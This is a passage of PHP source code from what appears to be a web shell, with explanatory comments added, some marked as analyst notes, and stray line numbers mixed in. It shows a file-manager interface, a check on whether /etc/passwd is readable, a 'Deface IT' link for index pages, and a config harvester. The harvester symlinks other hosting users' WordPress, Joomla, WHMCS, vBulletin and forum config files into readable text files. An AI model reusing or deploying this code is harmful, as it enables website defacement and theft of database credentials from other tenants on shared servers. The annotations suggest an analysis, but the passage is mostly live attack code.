// read /etc/passwd. Both are evaluated on every request, not lazily.
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
916
// Returns "owner / group" for the listing. With the posix extension it resolves the
// file's uid/gid to names; without it, it falls back to the *script's* own uid/gid,
// so every entry shows the same value regardless of $value.
function getOGid($value)
{
 if(!function_exists('posix_getegid')) {
 $user = @get_current_user();
 $uid = @getmyuid();
 $gid = @getmygid();
 $group = "?";
 $owner = $uid . "/". $gid;
 return $owner;
 } else {
 $name=@posix_getpwuid(@fileowner($value));
 $group=@posix_getgrgid(@filegroup($value));
 $owner = $name['name']. " / ". $group['name'];
 return $owner;
 }
}
933
// Directory-listing UI for $dir. Directories first, then files, each with permission
// colouring, owner/group, mtime, rename/download links and a bulk-action checkbox.
// Entries named index.php / index.html get a "Deface IT" link when $ind (the base64
// deface page from the top of the file) is non-empty; index.php, index.html,
// config.php and wp-config.php are highlighted in red. Observed quirks: $self is used
// in the download link but not declared global here; $pdir is computed and unused;
// the "if(class_exists('ZipArchive'))" text near the end sits inside the echo string
// and is emitted to the page literally rather than evaluated.
function mainfun($dir)
{
 global $ind, $directorysperator,$os;

 $mydir = basename(dirname(__FILE__));
 $pdir = str_replace($mydir,"",$dir);
 $pdir = str_replace("/","",$dir);

 $files = array();
 $dirs = array();

 $odir=opendir($dir);
 while($file = readdir($odir))
 {
 if(is_dir($dir.'/'.$file))
 {
 $dirs[]=$file;
 }
 else
 {
 $files[]=$file;
 }
 }
 // "." and ".." are counted in $dirs, hence the -2 for the displayed directory count.
 $countfiles = count($dirs) + count($files);
 $dircount = count($dirs);
 $dircount = $dircount-2;
 $myfiles = array_merge($dirs,$files);
 $i = 0;
 if(is_dir($dir))
 {
 if(scandir($dir) === false)
 echo "<center><font size=3>Directory isn't readable</font></center>";
 else
 {
?><form method="post" id="myform" name="myform">
 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
 <tr style="background-color:#0C0C0C; height:12px;">
 <th>Name</th>
 <th>Size</th>
 <th>Permissions</th>
 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
 <th>Modification Date</th>
 <th>Rename</th>
 <th>Download</th>
 <th style="width:2%;">Action</th>
 </tr>
 <?php
 foreach($myfiles as $val)
 {
 $vv = addslashes($dir . $directorysperator . $val);
 $i++;

 if($val == ".")
 {

 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>

 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($dir)."</font></td>";
 }
 ?>

 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
 <td></td><td></td><td></td></</tr><?php

 }
 else if($val == "..")
 {
 // Parent entry: Trail() strips the trailing "/.." and the current directory name.
 $val = Trail($dir . $directorysperator . $val,$directorysperator);
 $vv = addslashes($val);
 if(empty($vv))
 $vv = "/"; ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";

 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
 <td></td><td></td><td></td></tr><?php continue;
 }
 else if(is_dir($vv))
 {
 ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
 <td class='info'><font size=2>DIR</font></td>

 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td></td>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr></font>
 <?php
 }
 else if(is_file($vv))
 {
 ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>

 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>

 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>

 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>

 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr>
 <p>
 <?php
 }
 }

 // Bulk-action footer (delete / chmod / compress / uncompress via client-side myaction()).
 echo "</table>
<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
<select class=sbox name=choice style='width: 100px;'>
 <option value=delete>Delete</option>
 <option value=chmod>Change mode</option>
 if(class_exists('ZipArchive'))
 { <option value=compre>Compress</option>
 <option value=uncompre>Uncompress</option> }
 </select>

 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
 }}
 else
 {
 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
 }

}
// Analyst note: menu for the shell's config-file harvester (the "script" feature). The
// trigger is read from $_REQUEST, so it can arrive via GET, POST or cookie. $getpath is
// computed here and never used in this branch. Both links call the page's getdata() JS
// helper (defined elsewhere in the shell) with the request parameters 'manuallyscript'
// and 'scriptlocator', which are handled by the branches that follow.
if(isset($_REQUEST["script"]))
{
 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
 ?>
 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
 </tr></table></center>
 <?php
}
else if(isset($_REQUEST['manuallyscript']))
{
 // Analyst note: the "Do It Manually" form. The operator pastes text into a textarea
 // named "passwd"; the scriptlocator branch further down reads $_REQUEST['passwd'] and
 // parses it line by line with an /etc/passwd-style regex, so that is presumably what is
 // expected here. The button hands the text to the manuallyscriptfn() JS helper, which
 // is not in view. $self (assigned elsewhere) is echoed unescaped into the form action.
 ?>
 <center>
 <form action="<?php echo $self; ?>" method="post">
 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
 </form>
 </center>
 <?php
}
1106else if(isset($_REQUEST['scriptlocator']))
1107{
1108 if(stristr(php_uname(),"Linux"))
1109 {
1110 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1111 $path=explode('/',$url);
1112 $url =str_replace($path[count($path)-1],'',$url);
1113 function syml($usern,$pdomain)
1114 {
1115 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1116 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1117 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1118 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1119 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1120 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1121 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1122 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1123 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1124 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1125 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1126 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1127 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1128 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1129 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1130 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1131 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1132 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1133 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1134 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1135 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1136 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1137 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1138 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1139 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1140 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1141 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1142 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1143 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1144 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1145 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1146 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1147 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1148 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1149 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1150 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1151 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1152 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1153 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1154 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1155 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1156 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1157 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1158 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1159 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1160 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1161 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1162 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1163 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1164 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1165 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1166 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1167 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1168 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1169 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1170 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1171 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1172 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1173 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1174 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1175 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1176 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1177 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1178 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1179 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1180 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1181 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1182 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1183 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1184 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1185 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1186 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1187 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1188 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1189 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1190 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1191 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1192 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1193 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1194 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1195 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1196 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1197 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1198 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1199 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1200 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1201 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1202 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1203 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1204 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1205 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1206 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1207 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1208 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1209 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1210 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1211 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1212 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1213 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1214 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1215 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1216 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1217 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1218 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1219 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1220 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1221 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1222 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1223 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1224 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1225 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1226 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1227 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1228 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1229 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1230 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1231 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1232 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1233 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1234 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1235 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1236 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1237 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1238 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1239 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1240 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1241 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1242 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1243 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1244 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1245 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1246 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1247 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1248 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1249 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1250 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1251 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1252 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1253 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1254 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1255 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1256 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1257 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1258 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1259 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1260 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1261 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1262 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1263 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1264 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1265 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1266 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1267 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1268 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1269 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1270 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1271 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1272 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1273 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1274 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1275 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1276 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1277 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1278 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1279 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1280 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1281 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1282 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1283 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1284 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1285 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1286 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1287 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1288 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1289 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1290 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1291 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1292 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1293 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1294 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1295 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1296 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1297 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1298 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1299 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1300 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1301 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1302 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1303 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1304 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1305 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1306 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1307 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1308 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1309 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1310 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1311 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1312 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1313 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1314 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1315 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1316 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1317 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1318 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1319 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1320 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1321 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1322 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1323 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1324 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
